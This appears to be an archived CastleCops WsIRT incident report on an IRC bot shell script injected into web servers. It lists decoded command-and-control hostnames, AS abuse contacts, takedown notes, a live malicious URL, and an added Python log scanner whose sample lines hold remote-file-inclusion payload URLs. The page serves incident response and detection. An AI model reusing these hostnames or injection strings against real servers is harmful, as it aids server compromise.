CastleCops, Internet Crime Fighters

WsIRT(TM)

Webserver Incident Reporting and Termination(TM) Squad

NOTE: Web servers keep logs, and those logs contain evidence of attempted hacking. For instance, one may notice an attack that calls a script such as "r57.php??" from a remote server. It's these kinds of attacks we're looking to investigate. For a concrete example, see these reports.

Please do not submit phish, spam, or malware to WsIRT. Only submit attack signatures from web server logs. As this project hasn't officially been publicly launched, we are still reclassifying the tool and its verbiage.
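An added example, not part of CastleCops' WsIRT tooling, of the log check the note above describes: it scans Apache combined-format lines for query parameters that carry an absolute URL (a remote-file-inclusion attempt) and groups the hits by the host serving the script, which is the party a handler resolves and reports rather than the requesting client. The log lines, addresses and hostnames are constructed, and SHELL_NAMES is an assumed watch-list seeded only with the r57.php name from the note.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Fields of an Apache "combined" access-log line that the check needs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Assumed watch-list of attacker-shell filenames; r57.php comes from the
# note above, anything else should come from your own casework.
SHELL_NAMES = {"r57.php"}

def find_rfi_attempts(log_lines):
    """Return (client_ip, remote_host, remote_url, status) for every request
    whose query string carries an absolute URL: a remote-file-inclusion attempt."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m["target"]).query
        for _, value in parse_qsl(query, keep_blank_values=True):  # values are unquoted here
            try:
                remote = urlsplit(value)
            except ValueError:  # e.g. malformed IPv6 brackets inside the value
                continue
            if remote.scheme in ("http", "https", "ftp") and remote.hostname:
                hits.append((m["client"], remote.hostname, value, m["status"]))
    return hits

def triage_by_host(hits):
    """Group hits by the host serving the script: the host a handler resolves,
    maps to an AS and reports to its abuse contact, as the notes on this page do."""
    summary = defaultdict(lambda: {"clients": set(), "urls": set(), "known_shell": False})
    for client, host, url, _status in hits:
        entry = summary[host]
        entry["clients"].add(client)
        entry["urls"].add(url)
        if urlsplit(url).path.rsplit("/", 1)[-1].lower() in SHELL_NAMES:
            entry["known_shell"] = True
    return dict(summary)

# Constructed sample lines (RFC 5737 addresses, example.net host), not from the report.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2007:00:20:01 +0000] "GET /index.php?page=http://shell.example.net/r57.php?? HTTP/1.1" 200 4096',
    '203.0.113.7 - - [13/Dec/2007:00:20:02 +0000] "GET /cms/view.php?inc=http%3A%2F%2Fshell.example.net%2Fbot.txt%3F HTTP/1.1" 404 512',
    '198.51.100.9 - - [13/Dec/2007:00:21:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; the third sample line shows that an ordinary parameter value produces no hit.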

status: confirmed attack

HTTP Response (15 Jul, 2008 02:13:22): HTTP/1.1 302 Found; HTTP/1.1 200 OK
ID: 863 (termination link)
Title: IRC Bot Shell
Entry: WsIRT Squad
Reporter: Paul
Timestamp: 13 Dec, 2007 @ 00:22:14
Topic ID: 210364 - Read/respond to WsIRT commentary.

Handler Note (13 Dec, 2007 00:33:14):
Paul: This is the same IRC Bot Shell attacker script being used by troubled individuals as seen in the reports:

http://www.castlecops.com/IRC_Bot_Shell_attack649.html
http://www.castlecops.com/IRC_Bot_Shell_attack195.html

In fact, this one and 649 share the same hash fingerprint.

This script is being used by attackers injecting it onto remote web servers in an attempt to compromise them and take ownership of them for ill intent. Please remove immediately.

array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");

Translates to:

mymusicband.weedns.com
myphonenumber.weedns.com
ieatironx.weedns.com
himan.opendns.be
ko.dd.blueline.be
p4n33123e.dd.blueline.be
xphon3.opendns.be
myphone3.dnip.net
mymusics.dnip.net

Handler Note (13 Dec, 2007 00:33:39):
Paul: View CIDR AS8342 Report: http://www.cidr-report.org/cgi-bin/as-report?as=8342

"8342 | RU | ripencc | 1997-06-11 | RTCOMM-AS RTComm.RU Autonomous System"


Handler Note (13 Dec, 2007 00:33:40):
Paul: Extended information for AS8342:
State/Province:
Country: ru
Responsible Domain: rtcomm.ru
Abuse Email: security@rtcomm.ru

Handler Note (13 Dec, 2007 00:34:45):
Paul: View CIDR AS4713 Report: http://www.cidr-report.org/cgi-bin/as-report?as=4713

"4713 | JP | apnic | 1995-08-30 | OCN NTT Communications Corporation"


Handler Note (13 Dec, 2007 00:34:45):
Paul: Extended information for AS4713:
State/Province:
Country: jp
Responsible Domain: ocn.ad.jp
Abuse Email: abuse@ocn.ad.jp

Handler Note (13 Dec, 2007 00:35:04):
Paul: View CIDR AS3462 Report: http://www.cidr-report.org/cgi-bin/as-report?as=3462

"3462 | TW | apnic | 2002-08-01 | HINET Data Communication Business Group"


Handler Note (13 Dec, 2007 00:35:05):
Paul: Extended information for AS3462:
State/Province:
Country: tw
Responsible Domain: hinet.net
Abuse Email: cracker@hinet.net

Handler Note (13 Dec, 2007 00:35:22):
Paul: View CIDR AS21844 Report: http://www.cidr-report.org/cgi-bin/as-report?as=21844

"21844 | US | arin | 2001-06-29 | THEPLANET-AS - THE PLANET"


Handler Note (13 Dec, 2007 00:35:22):
Paul: Extended information for AS21844:
State/Province: tx
Country: us
Responsible Domain: theplanet.com
Abuse Email: abuse@theplanet.com

Handler Note (13 Dec, 2007 00:35:35):
Paul: View CIDR AS15703 Report: http://www.cidr-report.org/cgi-bin/as-report?as=15703

"15703 | NL | ripencc | 2000-09-19 | TRUESERVER-AS TrueServer BV AS number"


Handler Note (13 Dec, 2007 00:35:35):
Paul: Extended information for AS15703:
State/Province:
Country: nl
Responsible Domain: trueserver.nl
Abuse Email: abuse@true.nl

Handler Note (13 Dec, 2007 00:35:47):
Paul: View CIDR AS5617 Report: http://www.cidr-report.org/cgi-bin/as-report?as=5617

"5617 | PL | ripencc | 1996-04-29 | TPNET Polish Telecom_s commercial IP network"


Handler Note (13 Dec, 2007 00:35:47):
Paul: Extended information for AS5617:
State/Province:
Country: pl
Responsible Domain: tpnet.pl
Abuse Email: abuse@tpnet.pl

Handler Note (13 Dec, 2007 00:35:57):
Paul: View CIDR AS16317 Report: http://www.cidr-report.org/cgi-bin/as-report?as=16317

"16317 | SK | ripencc | 2001-02-23 | SK-4CALL 4CONSULT Ltd."


Handler Note (13 Dec, 2007 00:35:57):
Paul: Extended information for AS16317:
State/Province:
Country: sk
Responsible Domain: ipnet.sk
Abuse Email: security@ipnet.sk

Handler Note (13 Dec, 2007 00:36:04):
Paul: View CIDR AS35592 Report: http://www.cidr-report.org/cgi-bin/as-report?as=35592

"35592 | CZ | ripencc | 2005-09-13 | COOLHOUSING-AS COOLHOUSING Autonomous System"


Handler Note (13 Dec, 2007 00:36:05):
Paul: Extended information for AS35592:
State/Province:
Country: cz
Responsible Domain: network.cz
Abuse Email: abuse@network.cz

Handler Note (13 Dec, 2007 00:38:05):
Paul: View CIDR AS16742 Report: http://www.cidr-report.org/cgi-bin/as-report?as=16742

"16742 | CL | lacnic | 2000-06-05 | Universidad Catolica de Valparaiso"


Handler Note (13 Dec, 2007 00:38:05):
Paul: Extended information for AS16742:
State/Province:
Country: cl
Responsible Domain: ucv.cl
Abuse Email: abuse@ucv.cl

Handler Note (13 Dec, 2007 00:38:05):
Paul: ;; QUESTION SECTION:
;xphon3.opendns.be. IN A

;; ANSWER SECTION:
xphon3.opendns.be. 2560 IN A 158.251.4.149

Handler Note (13 Dec, 2007 00:41:51):
Paul: Generated and sent email attack alert to respective parties.

Handler Note (13 Dec, 2007 01:43:05):
Paul: Consumed following related reports:

[779] http://laudanskisucksss.chat.ru/placeholder/image?

Handler Note (16 Dec, 2007 02:23:00):
Paul: This link is still active. Please take down.

Handler Note (16 Dec, 2007 02:23:08):
Paul: Generated and sent email attack alert to respective parties.

Handler Note (16 Dec, 2007 19:05:21):
Paul: Sent a follow-up email to Yuri Ryazantsev asking for this to be taken down. A victim of this has contacted us in reference to this report being indexed on a search engine.

Fetched URLs
Slaves: 779
Report for at 13 Dec, 2007 @ 00:22:11
Fetched page at 13 Dec, 2007 @ 00:22:13
MD5 Fingerprint: d646a4310ac0bcafbdc090e7d01ceaee
SHA1 Fingerprint: d8fc4c592d79a70f50207c34f6af15afd63d7be7
Version 1.0